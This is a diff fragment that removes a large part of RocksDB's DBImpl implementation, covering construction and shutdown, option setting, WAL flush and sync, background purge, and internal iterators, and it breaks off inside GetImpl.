-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/range_del_aggregator.h"
-#include "db/table_cache.h"
-#include "db/table_properties_collector.h"
-#include "db/transaction_log_impl.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "db/write_callback.h"
-#include "memtable/hash_linklist_rep.h"
-#include "memtable/hash_skiplist_rep.h"
-#include "monitoring/iostats_context_imp.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/thread_status_updater.h"
-#include "monitoring/thread_status_util.h"
-#include "options/cf_options.h"
-#include "options/options_helper.h"
-#include "options/options_parser.h"
-#include "port/likely.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/status.h"
-#include "rocksdb/table.h"
-#include "rocksdb/version.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/block.h"
-#include "table/block_based_table_factory.h"
-#include "table/merging_iterator.h"
-#include "table/table_builder.h"
-#include "table/two_level_iterator.h"
-#include "tools/sst_dump_tool_imp.h"
-#include "util/auto_roll_logger.h"
-#include "util/autovector.h"
-#include "util/build_version.h"
-#include "util/coding.h"
-#include "util/compression.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/log_buffer.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/sst_file_manager_impl.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-const std::string kDefaultColumnFamilyName("default");
-void DumpRocksDBBuildVersion(Logger * log);
-
-CompressionType GetCompressionFlush(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options) {
-  // Compressing memtable flushes might not help unless the sequential load
-  // optimization is used for leveled compaction. Otherwise the CPU and
-  // latency overhead is not offset by saving much space.
-  if (ioptions.compaction_style == kCompactionStyleUniversal) {
-    if (ioptions.compaction_options_universal.compression_size_percent < 0) {
-      return mutable_cf_options.compression;
-    } else {
-      return kNoCompression;
-    }
-  } else if (!ioptions.compression_per_level.empty()) {
-    // For leveled compress when min_level_to_compress != 0.
-    return ioptions.compression_per_level[0];
-  } else {
-    return mutable_cf_options.compression;
-  }
-}
-
-namespace {
-void DumpSupportInfo(Logger* logger) {
-  ROCKS_LOG_HEADER(logger, "Compression algorithms supported:");
-  ROCKS_LOG_HEADER(logger, "\tSnappy supported: %d", Snappy_Supported());
-  ROCKS_LOG_HEADER(logger, "\tZlib supported: %d", Zlib_Supported());
-  ROCKS_LOG_HEADER(logger, "\tBzip supported: %d", BZip2_Supported());
-  ROCKS_LOG_HEADER(logger, "\tLZ4 supported: %d", LZ4_Supported());
-  ROCKS_LOG_HEADER(logger, "\tZSTD supported: %d", ZSTD_Supported());
-  ROCKS_LOG_HEADER(logger, "Fast CRC32 supported: %d",
-                   crc32c::IsFastCrc32Supported());
-}
-
-int64_t kDefaultLowPriThrottledRate = 2 * 1024 * 1024;
-} // namespace
-
-DBImpl::DBImpl(const DBOptions& options, const std::string& dbname)
-    : env_(options.env),
-      dbname_(dbname),
-      initial_db_options_(SanitizeOptions(dbname, options)),
-      immutable_db_options_(initial_db_options_),
-      mutable_db_options_(initial_db_options_),
-      stats_(immutable_db_options_.statistics.get()),
-      db_lock_(nullptr),
-      mutex_(stats_, env_, DB_MUTEX_WAIT_MICROS,
-             immutable_db_options_.use_adaptive_mutex),
-      shutting_down_(false),
-      bg_cv_(&mutex_),
-      logfile_number_(0),
-      log_dir_synced_(false),
-      log_empty_(true),
-      default_cf_handle_(nullptr),
-      log_sync_cv_(&mutex_),
-      total_log_size_(0),
-      max_total_in_memory_state_(0),
-      is_snapshot_supported_(true),
-      write_buffer_manager_(immutable_db_options_.write_buffer_manager.get()),
-      write_thread_(immutable_db_options_),
-      nonmem_write_thread_(immutable_db_options_),
-      write_controller_(mutable_db_options_.delayed_write_rate),
-      // Use delayed_write_rate as a base line to determine the initial
-      // low pri write rate limit. It may be adjusted later.
-      low_pri_write_rate_limiter_(NewGenericRateLimiter(std::min(
-          static_cast<int64_t>(mutable_db_options_.delayed_write_rate / 8),
-          kDefaultLowPriThrottledRate))),
-      last_batch_group_size_(0),
-      unscheduled_flushes_(0),
-      unscheduled_compactions_(0),
-      bg_bottom_compaction_scheduled_(0),
-      bg_compaction_scheduled_(0),
-      num_running_compactions_(0),
-      bg_flush_scheduled_(0),
-      num_running_flushes_(0),
-      bg_purge_scheduled_(0),
-      disable_delete_obsolete_files_(0),
-      delete_obsolete_files_last_run_(env_->NowMicros()),
-      last_stats_dump_time_microsec_(0),
-      next_job_id_(1),
-      has_unpersisted_data_(false),
-      unable_to_flush_oldest_log_(false),
-      env_options_(BuildDBOptions(immutable_db_options_, mutable_db_options_)),
-      num_running_ingest_file_(0),
-#ifndef ROCKSDB_LITE
-      wal_manager_(immutable_db_options_, env_options_),
-#endif  // ROCKSDB_LITE
-      event_logger_(immutable_db_options_.info_log.get()),
-      bg_work_paused_(0),
-      bg_compaction_paused_(0),
-      refitting_level_(false),
-      opened_successfully_(false),
-      concurrent_prepare_(options.concurrent_prepare),
-      manual_wal_flush_(options.manual_wal_flush) {
-  env_->GetAbsolutePath(dbname, &db_absolute_path_);
-
-  // Reserve ten files or so for other uses and give the rest to TableCache.
-  // Give a large number for setting of "infinite" open files.
-  const int table_cache_size = (mutable_db_options_.max_open_files == -1)
-                                   ? TableCache::kInfiniteCapacity
-                                   : mutable_db_options_.max_open_files - 10;
-  table_cache_ = NewLRUCache(table_cache_size,
-                             immutable_db_options_.table_cache_numshardbits);
-
-  versions_.reset(new VersionSet(dbname_, &immutable_db_options_, env_options_,
-                                 table_cache_.get(), write_buffer_manager_,
-                                 &write_controller_));
-  column_family_memtables_.reset(
-      new ColumnFamilyMemTablesImpl(versions_->GetColumnFamilySet()));
-
-  DumpRocksDBBuildVersion(immutable_db_options_.info_log.get());
-  DumpDBFileSummary(immutable_db_options_, dbname_);
-  immutable_db_options_.Dump(immutable_db_options_.info_log.get());
-  mutable_db_options_.Dump(immutable_db_options_.info_log.get());
-  DumpSupportInfo(immutable_db_options_.info_log.get());
-}
-
-// Will lock the mutex_,  will wait for completion if wait is true
-void DBImpl::CancelAllBackgroundWork(bool wait) {
-  InstrumentedMutexLock l(&mutex_);
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "Shutdown: canceling all background work");
-
-  if (!shutting_down_.load(std::memory_order_acquire) &&
-      has_unpersisted_data_.load(std::memory_order_relaxed) &&
-      !mutable_db_options_.avoid_flush_during_shutdown) {
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      if (!cfd->IsDropped() && cfd->initialized() && !cfd->mem()->IsEmpty()) {
-        cfd->Ref();
-        mutex_.Unlock();
-        FlushMemTable(cfd, FlushOptions());
-        mutex_.Lock();
-        cfd->Unref();
-      }
-    }
-    versions_->GetColumnFamilySet()->FreeDeadColumnFamilies();
-  }
-
-  shutting_down_.store(true, std::memory_order_release);
-  bg_cv_.SignalAll();
-  if (!wait) {
-    return;
-  }
-  // Wait for background work to finish
-  while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ ||
-         bg_flush_scheduled_) {
-    bg_cv_.Wait();
-  }
-}
-
-DBImpl::~DBImpl() {
-  // CancelAllBackgroundWork called with false means we just set the shutdown
-  // marker. After this we do a variant of the waiting and unschedule work
-  // (to consider: moving all the waiting into CancelAllBackgroundWork(true))
-  CancelAllBackgroundWork(false);
-  int bottom_compactions_unscheduled =
-      env_->UnSchedule(this, Env::Priority::BOTTOM);
-  int compactions_unscheduled = env_->UnSchedule(this, Env::Priority::LOW);
-  int flushes_unscheduled = env_->UnSchedule(this, Env::Priority::HIGH);
-  mutex_.Lock();
-  bg_bottom_compaction_scheduled_ -= bottom_compactions_unscheduled;
-  bg_compaction_scheduled_ -= compactions_unscheduled;
-  bg_flush_scheduled_ -= flushes_unscheduled;
-
-  // Wait for background work to finish
-  while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ ||
-         bg_flush_scheduled_ || bg_purge_scheduled_) {
-    TEST_SYNC_POINT("DBImpl::~DBImpl:WaitJob");
-    bg_cv_.Wait();
-  }
-  EraseThreadStatusDbInfo();
-  flush_scheduler_.Clear();
-
-  while (!flush_queue_.empty()) {
-    auto cfd = PopFirstFromFlushQueue();
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-  while (!compaction_queue_.empty()) {
-    auto cfd = PopFirstFromCompactionQueue();
-    if (cfd->Unref()) {
-      delete cfd;
-    }
-  }
-
-  if (default_cf_handle_ != nullptr) {
-    // we need to delete handle outside of lock because it does its own locking
-    mutex_.Unlock();
-    delete default_cf_handle_;
-    mutex_.Lock();
-  }
-
-  // Clean up obsolete files due to SuperVersion release.
-  // (1) Need to delete to obsolete files before closing because RepairDB()
-  // scans all existing files in the file system and builds manifest file.
-  // Keeping obsolete files confuses the repair process.
-  // (2) Need to check if we Open()/Recover() the DB successfully before
-  // deleting because if VersionSet recover fails (may be due to corrupted
-  // manifest file), it is not able to identify live files correctly. As a
-  // result, all "live" files can get deleted by accident. However, corrupted
-  // manifest is recoverable by RepairDB().
-  if (opened_successfully_) {
-    JobContext job_context(next_job_id_.fetch_add(1));
-    FindObsoleteFiles(&job_context, true);
-
-    mutex_.Unlock();
-    // manifest number starting from 2
-    job_context.manifest_file_number = 1;
-    if (job_context.HaveSomethingToDelete()) {
-      PurgeObsoleteFiles(job_context);
-    }
-    job_context.Clean();
-    mutex_.Lock();
-  }
-
-  for (auto l : logs_to_free_) {
-    delete l;
-  }
-  for (auto& log : logs_) {
-    log.ClearWriter();
-  }
-  logs_.clear();
-
-  // Table cache may have table handles holding blocks from the block cache.
-  // We need to release them before the block cache is destroyed. The block
-  // cache may be destroyed inside versions_.reset(), when column family data
-  // list is destroyed, so leaving handles in table cache after
-  // versions_.reset() may cause issues.
-  // Here we clean all unreferenced handles in table cache.
-  // Now we assume all user queries have finished, so only version set itself
-  // can possibly hold the blocks from block cache. After releasing unreferenced
-  // handles here, only handles held by version set left and inside
-  // versions_.reset(), we will release them. There, we need to make sure every
-  // time a handle is released, we erase it from the cache too. By doing that,
-  // we can guarantee that after versions_.reset(), table cache is empty
-  // so the cache can be safely destroyed.
-  table_cache_->EraseUnRefEntries();
-
-  for (auto& txn_entry : recovered_transactions_) {
-    delete txn_entry.second;
-  }
-
-  // versions need to be destroyed before table_cache since it can hold
-  // references to table_cache.
-  versions_.reset();
-  mutex_.Unlock();
-  if (db_lock_ != nullptr) {
-    env_->UnlockFile(db_lock_);
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log, "Shutdown complete");
-  LogFlush(immutable_db_options_.info_log);
-}
-
-void DBImpl::MaybeIgnoreError(Status* s) const {
-  if (s->ok() || immutable_db_options_.paranoid_checks) {
-    // No change needed
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "Ignoring error %s",
-                   s->ToString().c_str());
-    *s = Status::OK();
-  }
-}
-
-const Status DBImpl::CreateArchivalDirectory() {
-  if (immutable_db_options_.wal_ttl_seconds > 0 ||
-      immutable_db_options_.wal_size_limit_mb > 0) {
-    std::string archivalPath = ArchivalDirectory(immutable_db_options_.wal_dir);
-    return env_->CreateDirIfMissing(archivalPath);
-  }
-  return Status::OK();
-}
-
-void DBImpl::PrintStatistics() {
-  auto dbstats = immutable_db_options_.statistics.get();
-  if (dbstats) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "STATISTICS:\n %s",
-                   dbstats->ToString().c_str());
-  }
-}
-
-void DBImpl::MaybeDumpStats() {
-  mutex_.Lock();
-  unsigned int stats_dump_period_sec =
-      mutable_db_options_.stats_dump_period_sec;
-  mutex_.Unlock();
-  if (stats_dump_period_sec == 0) return;
-
-  const uint64_t now_micros = env_->NowMicros();
-
-  if (last_stats_dump_time_microsec_ + stats_dump_period_sec * 1000000 <=
-      now_micros) {
-    // Multiple threads could race in here simultaneously.
-    // However, the last one will update last_stats_dump_time_microsec_
-    // atomically. We could see more than one dump during one dump
-    // period in rare cases.
-    last_stats_dump_time_microsec_ = now_micros;
-
-#ifndef ROCKSDB_LITE
-    const DBPropertyInfo* cf_property_info =
-        GetPropertyInfo(DB::Properties::kCFStats);
-    assert(cf_property_info != nullptr);
-    const DBPropertyInfo* db_property_info =
-        GetPropertyInfo(DB::Properties::kDBStats);
-    assert(db_property_info != nullptr);
-
-    std::string stats;
-    {
-      InstrumentedMutexLock l(&mutex_);
-      default_cf_internal_stats_->GetStringProperty(
-          *db_property_info, DB::Properties::kDBStats, &stats);
-      for (auto cfd : *versions_->GetColumnFamilySet()) {
-        if (cfd->initialized()) {
-          cfd->internal_stats()->GetStringProperty(
-              *cf_property_info, DB::Properties::kCFStatsNoFileHistogram,
-              &stats);
-        }
-      }
-      for (auto cfd : *versions_->GetColumnFamilySet()) {
-        if (cfd->initialized()) {
-          cfd->internal_stats()->GetStringProperty(
-              *cf_property_info, DB::Properties::kCFFileHistogram, &stats);
-        }
-      }
-    }
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "------- DUMPING STATS -------");
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "%s", stats.c_str());
-    if (immutable_db_options_.dump_malloc_stats) {
-      stats.clear();
-      DumpMallocStats(&stats);
-      if (!stats.empty()) {
-        ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                       "------- Malloc STATS -------");
-        ROCKS_LOG_WARN(immutable_db_options_.info_log, "%s", stats.c_str());
-      }
-    }
-#endif  // !ROCKSDB_LITE
-
-    PrintStatistics();
-  }
-}
-
-void DBImpl::ScheduleBgLogWriterClose(JobContext* job_context) {
-  if (!job_context->logs_to_free.empty()) {
-    for (auto l : job_context->logs_to_free) {
-      AddToLogsToFreeQueue(l);
-    }
-    job_context->logs_to_free.clear();
-    SchedulePurge();
-  }
-}
-
-Directory* DBImpl::Directories::GetDataDir(size_t path_id) {
-  assert(path_id < data_dirs_.size());
-  Directory* ret_dir = data_dirs_[path_id].get();
-  if (ret_dir == nullptr) {
-    // Should use db_dir_
-    return db_dir_.get();
-  }
-  return ret_dir;
-}
-
-Status DBImpl::SetOptions(ColumnFamilyHandle* column_family,
-    const std::unordered_map<std::string, std::string>& options_map) {
-#ifdef ROCKSDB_LITE
-  return Status::NotSupported("Not supported in ROCKSDB LITE");
-#else
-  auto* cfd = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family)->cfd();
-  if (options_map.empty()) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "SetOptions() on column family [%s], empty input",
-                   cfd->GetName().c_str());
-    return Status::InvalidArgument("empty input");
-  }
-
-  MutableCFOptions new_options;
-  Status s;
-  Status persist_options_status;
-  WriteThread::Writer w;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    s = cfd->SetOptions(options_map);
-    if (s.ok()) {
-      new_options = *cfd->GetLatestMutableCFOptions();
-      // Append new version to recompute compaction score.
-      VersionEdit dummy_edit;
-      versions_->LogAndApply(cfd, new_options, &dummy_edit, &mutex_,
-                             directories_.GetDbDir());
-      // Trigger possible flush/compactions. This has to be before we persist
-      // options to file, otherwise there will be a deadlock with writer
-      // thread.
-      auto* old_sv =
-          InstallSuperVersionAndScheduleWork(cfd, nullptr, new_options);
-      delete old_sv;
-
-      persist_options_status = WriteOptionsFile(
-          false /*need_mutex_lock*/, true /*need_enter_write_thread*/);
-    }
-  }
-
-  ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                 "SetOptions() on column family [%s], inputs:",
-                 cfd->GetName().c_str());
-  for (const auto& o : options_map) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "%s: %s\n", o.first.c_str(),
-                   o.second.c_str());
-  }
-  if (s.ok()) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log,
-                   "[%s] SetOptions() succeeded", cfd->GetName().c_str());
-    new_options.Dump(immutable_db_options_.info_log.get());
-    if (!persist_options_status.ok()) {
-      s = persist_options_status;
-    }
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "[%s] SetOptions() failed",
-                   cfd->GetName().c_str());
-  }
-  LogFlush(immutable_db_options_.info_log);
-  return s;
-#endif  // ROCKSDB_LITE
-}
-
-Status DBImpl::SetDBOptions(
-    const std::unordered_map<std::string, std::string>& options_map) {
-#ifdef ROCKSDB_LITE
-  return Status::NotSupported("Not supported in ROCKSDB LITE");
-#else
-  if (options_map.empty()) {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "SetDBOptions(), empty input.");
-    return Status::InvalidArgument("empty input");
-  }
-
-  MutableDBOptions new_options;
-  Status s;
-  Status persist_options_status;
-  WriteThread::Writer w;
-  WriteContext write_context;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    s = GetMutableDBOptionsFromStrings(mutable_db_options_, options_map,
-                                       &new_options);
-    if (s.ok()) {
-      if (new_options.max_background_compactions >
-          mutable_db_options_.max_background_compactions) {
-        env_->IncBackgroundThreadsIfNeeded(
-            new_options.max_background_compactions, Env::Priority::LOW);
-        MaybeScheduleFlushOrCompaction();
-      }
-
-      write_controller_.set_max_delayed_write_rate(new_options.delayed_write_rate);
-      table_cache_.get()->SetCapacity(new_options.max_open_files == -1
-                                          ? TableCache::kInfiniteCapacity
-                                          : new_options.max_open_files - 10);
-
-      mutable_db_options_ = new_options;
-
-      write_thread_.EnterUnbatched(&w, &mutex_);
-      if (total_log_size_ > GetMaxTotalWalSize()) {
-        Status purge_wal_status = HandleWALFull(&write_context);
-        if (!purge_wal_status.ok()) {
-          ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                         "Unable to purge WAL files in SetDBOptions() -- %s",
-                         purge_wal_status.ToString().c_str());
-        }
-      }
-      persist_options_status = WriteOptionsFile(
-          false /*need_mutex_lock*/, false /*need_enter_write_thread*/);
-      write_thread_.ExitUnbatched(&w);
-    }
-  }
-  ROCKS_LOG_INFO(immutable_db_options_.info_log, "SetDBOptions(), inputs:");
-  for (const auto& o : options_map) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "%s: %s\n", o.first.c_str(),
-                   o.second.c_str());
-  }
-  if (s.ok()) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "SetDBOptions() succeeded");
-    new_options.Dump(immutable_db_options_.info_log.get());
-    if (!persist_options_status.ok()) {
-      if (immutable_db_options_.fail_if_options_file_error) {
-        s = Status::IOError(
-            "SetDBOptions() succeeded, but unable to persist options",
-            persist_options_status.ToString());
-      }
-      ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                     "Unable to persist options in SetDBOptions() -- %s",
-                     persist_options_status.ToString().c_str());
-    }
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log, "SetDBOptions failed");
-  }
-  LogFlush(immutable_db_options_.info_log);
-  return s;
-#endif  // ROCKSDB_LITE
-}
-
-// return the same level if it cannot be moved
-int DBImpl::FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd,
-    const MutableCFOptions& mutable_cf_options, int level) {
-  mutex_.AssertHeld();
-  const auto* vstorage = cfd->current()->storage_info();
-  int minimum_level = level;
-  for (int i = level - 1; i > 0; --i) {
-    // stop if level i is not empty
-    if (vstorage->NumLevelFiles(i) > 0) break;
-    // stop if level i is too small (cannot fit the level files)
-    if (vstorage->MaxBytesForLevel(i) < vstorage->NumLevelBytes(level)) {
-      break;
-    }
-
-    minimum_level = i;
-  }
-  return minimum_level;
-}
-
-Status DBImpl::FlushWAL(bool sync) {
-  {
-    // We need to lock log_write_mutex_ since logs_ might change concurrently
-    InstrumentedMutexLock wl(&log_write_mutex_);
-    log::Writer* cur_log_writer = logs_.back().writer;
-    auto s = cur_log_writer->WriteBuffer();
-    if (!s.ok()) {
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log, "WAL flush error %s",
-                      s.ToString().c_str());
-    }
-    if (!sync) {
-      ROCKS_LOG_DEBUG(immutable_db_options_.info_log, "FlushWAL sync=false");
-      return s;
-    }
-  }
-  // sync = true
-  ROCKS_LOG_DEBUG(immutable_db_options_.info_log, "FlushWAL sync=true");
-  return SyncWAL();
-}
-
-Status DBImpl::SyncWAL() {
-  autovector<log::Writer*, 1> logs_to_sync;
-  bool need_log_dir_sync;
-  uint64_t current_log_number;
-
-  {
-    InstrumentedMutexLock l(&mutex_);
-    assert(!logs_.empty());
-
-    // This SyncWAL() call only cares about logs up to this number.
-    current_log_number = logfile_number_;
-
-    while (logs_.front().number <= current_log_number &&
-           logs_.front().getting_synced) {
-      log_sync_cv_.Wait();
-    }
-    // First check that logs are safe to sync in background.
-    for (auto it = logs_.begin();
-         it != logs_.end() && it->number <= current_log_number; ++it) {
-      if (!it->writer->file()->writable_file()->IsSyncThreadSafe()) {
-        return Status::NotSupported(
-            "SyncWAL() is not supported for this implementation of WAL file",
-            immutable_db_options_.allow_mmap_writes
-                ? "try setting Options::allow_mmap_writes to false"
-                : Slice());
-      }
-    }
-    for (auto it = logs_.begin();
-         it != logs_.end() && it->number <= current_log_number; ++it) {
-      auto& log = *it;
-      assert(!log.getting_synced);
-      log.getting_synced = true;
-      logs_to_sync.push_back(log.writer);
-    }
-
-    need_log_dir_sync = !log_dir_synced_;
-  }
-
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:1");
-  RecordTick(stats_, WAL_FILE_SYNCED);
-  Status status;
-  for (log::Writer* log : logs_to_sync) {
-    status = log->file()->SyncWithoutFlush(immutable_db_options_.use_fsync);
-    if (!status.ok()) {
-      break;
-    }
-  }
-  if (status.ok() && need_log_dir_sync) {
-    status = directories_.GetWalDir()->Fsync();
-  }
-  TEST_SYNC_POINT("DBWALTest::SyncWALNotWaitWrite:2");
-
-  TEST_SYNC_POINT("DBImpl::SyncWAL:BeforeMarkLogsSynced:1");
-  {
-    InstrumentedMutexLock l(&mutex_);
-    MarkLogsSynced(current_log_number, need_log_dir_sync, status);
-  }
-  TEST_SYNC_POINT("DBImpl::SyncWAL:BeforeMarkLogsSynced:2");
-
-  return status;
-}
-
-void DBImpl::MarkLogsSynced(
-    uint64_t up_to, bool synced_dir, const Status& status) {
-  mutex_.AssertHeld();
-  if (synced_dir &&
-      logfile_number_ == up_to &&
-      status.ok()) {
-    log_dir_synced_ = true;
-  }
-  for (auto it = logs_.begin(); it != logs_.end() && it->number <= up_to;) {
-    auto& log = *it;
-    assert(log.getting_synced);
-    if (status.ok() && logs_.size() > 1) {
-      logs_to_free_.push_back(log.ReleaseWriter());
-      it = logs_.erase(it);
-    } else {
-      log.getting_synced = false;
-      ++it;
-    }
-  }
-  assert(!status.ok() || logs_.empty() || logs_[0].number > up_to ||
-         (logs_.size() == 1 && !logs_[0].getting_synced));
-  log_sync_cv_.SignalAll();
-}
-
-SequenceNumber DBImpl::GetLatestSequenceNumber() const {
-  return versions_->LastSequence();
-}
-
-InternalIterator* DBImpl::NewInternalIterator(
-    Arena* arena, RangeDelAggregator* range_del_agg,
-    ColumnFamilyHandle* column_family) {
-  ColumnFamilyData* cfd;
-  if (column_family == nullptr) {
-    cfd = default_cf_handle_->cfd();
-  } else {
-    auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-    cfd = cfh->cfd();
-  }
-
-  mutex_.Lock();
-  SuperVersion* super_version = cfd->GetSuperVersion()->Ref();
-  mutex_.Unlock();
-  ReadOptions roptions;
-  return NewInternalIterator(roptions, cfd, super_version, arena,
-                             range_del_agg);
-}
-
-void DBImpl::SchedulePurge() {
-  mutex_.AssertHeld();
-  assert(opened_successfully_);
-
-  // Purge operations are put into High priority queue
-  bg_purge_scheduled_++;
-  env_->Schedule(&DBImpl::BGWorkPurge, this, Env::Priority::HIGH, nullptr);
-}
-
-void DBImpl::BackgroundCallPurge() {
-  mutex_.Lock();
-
-  // We use one single loop to clear both queues so that after existing the loop
-  // both queues are empty. This is stricter than what is needed, but can make
-  // it easier for us to reason the correctness.
-  while (!purge_queue_.empty() || !logs_to_free_queue_.empty()) {
-    if (!purge_queue_.empty()) {
-      auto purge_file = purge_queue_.begin();
-      auto fname = purge_file->fname;
-      auto type = purge_file->type;
-      auto number = purge_file->number;
-      auto path_id = purge_file->path_id;
-      auto job_id = purge_file->job_id;
-      purge_queue_.pop_front();
-
-      mutex_.Unlock();
-      Status file_deletion_status;
-      DeleteObsoleteFileImpl(file_deletion_status, job_id, fname, type, number,
-                             path_id);
-      mutex_.Lock();
-    } else {
-      assert(!logs_to_free_queue_.empty());
-      log::Writer* log_writer = *(logs_to_free_queue_.begin());
-      logs_to_free_queue_.pop_front();
-      mutex_.Unlock();
-      delete log_writer;
-      mutex_.Lock();
-    }
-  }
-  bg_purge_scheduled_--;
-
-  bg_cv_.SignalAll();
-  // IMPORTANT:there should be no code after calling SignalAll. This call may
-  // signal the DB destructor that it's OK to proceed with destruction. In
-  // that case, all DB variables will be dealloacated and referencing them
-  // will cause trouble.
-  mutex_.Unlock();
-}
-
-namespace {
-struct IterState {
-  IterState(DBImpl* _db, InstrumentedMutex* _mu, SuperVersion* _super_version,
-            bool _background_purge)
-      : db(_db),
-        mu(_mu),
-        super_version(_super_version),
-        background_purge(_background_purge) {}
-
-  DBImpl* db;
-  InstrumentedMutex* mu;
-  SuperVersion* super_version;
-  bool background_purge;
-};
-
-static void CleanupIteratorState(void* arg1, void* arg2) {
-  IterState* state = reinterpret_cast<IterState*>(arg1);
-
-  if (state->super_version->Unref()) {
-    // Job id == 0 means that this is not our background process, but rather
-    // user thread
-    JobContext job_context(0);
-
-    state->mu->Lock();
-    state->super_version->Cleanup();
-    state->db->FindObsoleteFiles(&job_context, false, true);
-    if (state->background_purge) {
-      state->db->ScheduleBgLogWriterClose(&job_context);
-    }
-    state->mu->Unlock();
-
-    delete state->super_version;
-    if (job_context.HaveSomethingToDelete()) {
-      if (state->background_purge) {
-        // PurgeObsoleteFiles here does not delete files. Instead, it adds the
-        // files to be deleted to a job queue, and deletes it in a separate
-        // background thread.
-        state->db->PurgeObsoleteFiles(job_context, true /* schedule only */);
-        state->mu->Lock();
-        state->db->SchedulePurge();
-        state->mu->Unlock();
-      } else {
-        state->db->PurgeObsoleteFiles(job_context);
-      }
-    }
-    job_context.Clean();
-  }
-
-  delete state;
-}
-}  // namespace
-
-InternalIterator* DBImpl::NewInternalIterator(
-    const ReadOptions& read_options, ColumnFamilyData* cfd,
-    SuperVersion* super_version, Arena* arena,
-    RangeDelAggregator* range_del_agg) {
-  InternalIterator* internal_iter;
-  assert(arena != nullptr);
-  assert(range_del_agg != nullptr);
-  // Need to create internal iterator from the arena.
-  MergeIteratorBuilder merge_iter_builder(
-      &cfd->internal_comparator(), arena,
-      !read_options.total_order_seek &&
-          cfd->ioptions()->prefix_extractor != nullptr);
-  // Collect iterator for mutable mem
-  merge_iter_builder.AddIterator(
-      super_version->mem->NewIterator(read_options, arena));
-  std::unique_ptr<InternalIterator> range_del_iter;
-  Status s;
-  if (!read_options.ignore_range_deletions) {
-    range_del_iter.reset(
-        super_version->mem->NewRangeTombstoneIterator(read_options));
-    s = range_del_agg->AddTombstones(std::move(range_del_iter));
-  }
-  // Collect all needed child iterators for immutable memtables
-  if (s.ok()) {
-    super_version->imm->AddIterators(read_options, &merge_iter_builder);
-    if (!read_options.ignore_range_deletions) {
-      s = super_version->imm->AddRangeTombstoneIterators(read_options, arena,
-                                                         range_del_agg);
-    }
-  }
-  if (s.ok()) {
-    // Collect iterators for files in L0 - Ln
-    if (read_options.read_tier != kMemtableTier) {
-      super_version->current->AddIterators(read_options, env_options_,
-                                           &merge_iter_builder, range_del_agg);
-    }
-    internal_iter = merge_iter_builder.Finish();
-    IterState* cleanup =
-        new IterState(this, &mutex_, super_version,
-                      read_options.background_purge_on_iterator_cleanup);
-    internal_iter->RegisterCleanup(CleanupIteratorState, cleanup, nullptr);
-
-    return internal_iter;
-  }
-  return NewErrorInternalIterator(s);
-}
-
-ColumnFamilyHandle* DBImpl::DefaultColumnFamily() const {
-  return default_cf_handle_;
-}
-
-Status DBImpl::Get(const ReadOptions& read_options,
-                   ColumnFamilyHandle* column_family, const Slice& key,
-                   PinnableSlice* value) {
-  return GetImpl(read_options, column_family, key, value);
-}
-
-Status DBImpl::GetImpl(const ReadOptions& read_options,
-                       ColumnFamilyHandle* column_family, const Slice& key,
-                       PinnableSlice* pinnable_val, bool* value_found,
-                       bool* is_blob_index) {
-  assert(pinnable_val != nullptr);
-  StopWatch sw(env_, stats_, DB_GET);
-  PERF_TIMER_GUARD(get_snapshot_time);
-
-  auto cfh = reinterpret_cast<ColumnFamilyHandleImpl*>(column_family);
-  auto cfd = cfh->cfd();
-
-  // Acquire SuperVersion
-  SuperVersion* sv = GetAndRefSuperVersion(cfd);
-
-  TEST_SYNC_POINT("DBImpl::GetImpl:1");
-  TEST_SYNC_POINT("DBImpl::GetImpl:2");
-
-  SequenceNumber snapshot;
-  if (read_options.snapshot != nullptr) {
-    snapshot = reinterpret_cast<const SnapshotImpl*>(
-        read_options.snapshot)->number_;
-  } else {
-    // Since we get and reference the super version before getting
-    // the snapshot number, without a mutex protection, it is possible
-    // that a memtable switch happened in the middle and not all the
-    // data for this snapshot is available. But it will contain all
-    // the data available in the super version we have, which is also
-    // a valid snapshot to read from.
-    // We shouldn't get snapshot before finding and referencing the
-    // super versipon because a flush happening in between may compact
-    // away data for the snapshot, but the snapshot is earlier than the
-    // data overwriting it, so users may see wrong results.
-    snapshot = versions_->LastSequence();
-  }
-  TEST_SYNC_POINT("DBImpl::GetImpl:3");
